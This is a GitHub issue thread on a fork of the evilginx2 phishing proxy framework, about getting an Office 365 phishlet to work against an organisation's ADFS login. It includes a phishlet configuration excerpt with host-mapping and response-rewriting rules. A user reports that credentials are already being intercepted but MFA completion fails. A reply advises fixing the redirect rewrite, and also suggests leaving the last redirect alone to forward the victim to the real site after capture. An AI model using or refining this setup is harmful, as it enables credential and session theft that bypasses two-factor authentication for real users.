hash3liZer / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
GNU General Public License v3.0

ADFS redirect error #20

Closed echelonblue closed 3 years ago

echelonblue commented 3 years ago

I did read the readme and am aware of the part about not asking for phishlet fixes. However, this smells like a bug, so I'll give it a try:

An O365 test was done on a domain that used its own ADFS.

This ADFS domain was like sts.somedomain.com. The relevant sections were changed in the o365 phishlet:

An example of lines 13 through 21 is as follows:

  #    sts.somedomain.com = adfs.example.com
  - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com', session: true, is_landing:false}
  - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com:443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  - {triggers_on: 'sts.somedomain.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:

The Evilginx server was run and forwards to the ADFS site. Credentials like account and password are intercepted. However, the following error is the result after the MFA code is submitted:

https://somedomain.com/adfs/services/trust' does not exist. 

Looks like something goes wrong with redirecting.

Any solutions?

JamesCullum commented 3 years ago

Where does this error come up? In the console or on the O365 website?

echelonblue commented 3 years ago

The Office 365 website. See the error.

JamesCullum commented 3 years ago

Then this looks like an issue with the phishlet and/or your configuration. Basically you need to make sure that the redirect is rewritten properly. Depending on the context, not rewriting it at the last step can be helpful if you want to forward the user to the real website and already captured all you need.